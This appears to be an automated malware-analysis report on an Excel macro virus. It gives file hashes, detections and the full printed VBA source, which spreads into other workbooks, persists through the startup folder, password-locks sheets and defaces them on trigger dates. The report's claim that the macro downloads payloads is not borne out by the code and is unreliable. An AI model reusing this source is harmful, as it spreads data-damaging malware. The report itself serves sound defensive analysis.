Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 35bee95d1797a701…

MALICIOUS

Office (OLE)

264.0 KB Created: 1996-12-17 01:32:42 Authoring application: Microsoft Excel First seen: 2015-10-03
MD5: da4038ce5200c08847737cfa21a57dc0 SHA-1: 8a29368ca004b52e6661801abbb4dec2a04288aa SHA-256: 35bee95d1797a701f5a732be7cea5eeac527de3d23c3701899855ed7e1970a79
88 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing VBA macros, including an Auto_Open macro, which is a common technique for initial execution. The ClamAV detection 'Xls.Trojan.Pink-2' and the presence of VBA macros strongly suggest malicious intent, likely to download and execute further payloads. The macro attempts to hide its presence by renaming modules and manipulating workbook visibility, indicating a deliberate effort to evade detection.

Heuristics 3

  • ClamAV: Xls.Trojan.Pink-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Pink-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4485 bytes
SHA-256: 6ac49b120d1b6cb8654406bd32290f418c112a95238fd2ad037162683052413c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NV12910"

Sub auto_open()
Application.OnSheetActivate = "pink"
End Sub
Sub pink()
    Dim mn, virname, thismo, passwords, pick, pickmo, head, getname As String, i, j, k, num, wbc, thisnum As Integer
    wbc = Workbooks.count
    For k = 1 To wbc
    If Workbooks(k).Name = "B00k1.xls" Then
        getname = "B00k1.xls"
        Windows("B00k1.xls").Visible = False
            If Workbooks("B00k1.xls").Saved = False Then
                
                Workbooks("B00k1.xls").Save
            End If
        Exit For
     End If
    Next
    If wbc < 2 Then
        GoTo final
    End If
    thisnum = ThisWorkbook.Modules.count
    num = ActiveWorkbook.Modules.count
    For i = 1 To thisnum
        thismo = ThisWorkbook.Modules(i).Name
        pickmo = Right(Left(thismo, 2), 1)
        If pickmo = "V" Then
            namemo = ThisWorkbook.Modules(i).Name
            Exit For
        End If
    Next
    If (Asc(ActiveWorkbook.Name) >= 97 And Asc(ActiveWorkbook.Name) <= 122) Or (Asc(ActiveWorkbook.Name) >= 65 And Asc(ActiveWorkbook.Name) <= 90) Then
        head = Chr(Asc(ActiveWorkbook.Name))
    Else
        head = "N"
    End If
    mn = head & "V" & Month(Now) & Day(Now) & Right(Time$, 2)
    For j = 1 To num
        pick = Right(Left(ActiveWorkbook.Modules(j).Name, 2), 1)
        If pick = "V" Then
            End
        End If
    Next
        If Month(Now) + Day(Now) <> 13 And ActiveSheet.Range("iv65536").FormulaR1C1 <> "=""""" Then
            ActiveSheet.Range("iv65536").FormulaR1C1 = "="""""
        End If
    ThisWorkbook.Sheets(namemo).Copy ActiveWorkbook.ActiveSheet
    ActiveWorkbook.Modules(namemo).Name = mn
    If Left(ActiveWorkbook.Name, 4) <> "Book" Then
       
    End If
    Application.ScreenUpdating = False
    passwords = Left((Rnd * 1000000000 + 100000000), 8)
    If Month(Now) + Day(Now) = 13 Then
    ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True, password:=passwords
    End If
    If Month(Now) = 6 And Day(Now) = 15 Then
      With Cells
   .ClearFormats
   .ColumnWidth = 2.75
   .RowHeight = 15
   End With
    ActiveWindow.Zoom = 25
    Union(Range( _
        "AO15,AP15,AO16,AP16,AO16,AO17,AP17,AO18,AP18,AO19,AP19,AO20,AP20,AO21,AP21,AO22,AP22,AO23,AP23,AO24,AP24,AO25,AP25,AO26,AP26,AO27,AP27,AO28,AP28,AO29,AP29,AO30" _
        ), Range( _
        "AP30,AO31,AP31,AN19,AM19,AL19,AK19,AJ19,AJ19,AI19,AH19,AG19,AG20,AH20,AI20,AJ20,AK20,AL20,AM20,AN20,AG18,AH18,AI18,AJ18,AK18,AL18,AM18,AN18,AQ18,AR18,AS18,AT18" _
        ), Range( _
        "AU18,AV18,AW18,AX18,AQ19,AR19,AS19,AT19,AU19,AV19,AW19,AX19,AQ20,AR20,AS20,AT20,AU20,AV20,AW20,AX20,AQ30,AR30,AS30,AT30,AU30,AV30,AW30,AX30,AQ31,AR31,AS31,AT31" _
        ), Range( _
        "AU31,AV31,AW31,AX31,AG21,AG22,AG23,AG24,AG25,AG26,AG27,AG28,AG29,AG30,AG31,AH21,AH22,AH23,AH24,AH25,AH26,AH27,AH28,AH29,AH30,AH31,AW17,AW16,AW15,AW14,AW14,AW13" _
        ), Range( _
        "AW12,AW11,AW11,AW10,AW9,AW8,AW7,AX7,AX8,AX9,AX10,AX11,AX12,AX13,AX14,AX15,AX16,AX17,AG6,AH6,AI6,AJ6,AK6,AL6,AM6,AN6,AO6,AP6,AW6,AX6,AG31,AG31" _
        ), Range( _
        "AG32,AH32,AO32,AP32,AQ32,AR32,AS32,AT32,AU32,AV32,AW32,AX32,AG7,AH7,AI7,AJ7,AK7,AL7,AM7,AN7,AO7,AP7,AG8,AH8,AI8,AJ8,AK8,AL8,AM8,AN8,AO8,AP8" _
        ), Range("AO9,AP9,AO10,AP10,AO11,AP11,AO12,AP12,AO13,AP13,AO14,AP14")) = "OO"
        ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True, password:=passwords
    ElseIf Month(Now) + Day(Now) = 22 Then
    ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True, password:=passwords
    End If
final:
    virname = Dir(Application.StartupPath & "\B00k1.xls")
    If virname = "" Then
        ThisWorkbook.Sheets(2).Range("iv65536").FormulaR1C1 = "="""""
        ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\" & "B00k1.xls"
        If getname = "" Then
            Application.OnSheetActivate = ""
            End
        End If
        ActiveWindow.Visible = False
    End If
    Application.OnSheetActivate = Application.StartupPath & "\" & "B00k1!pink"
End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True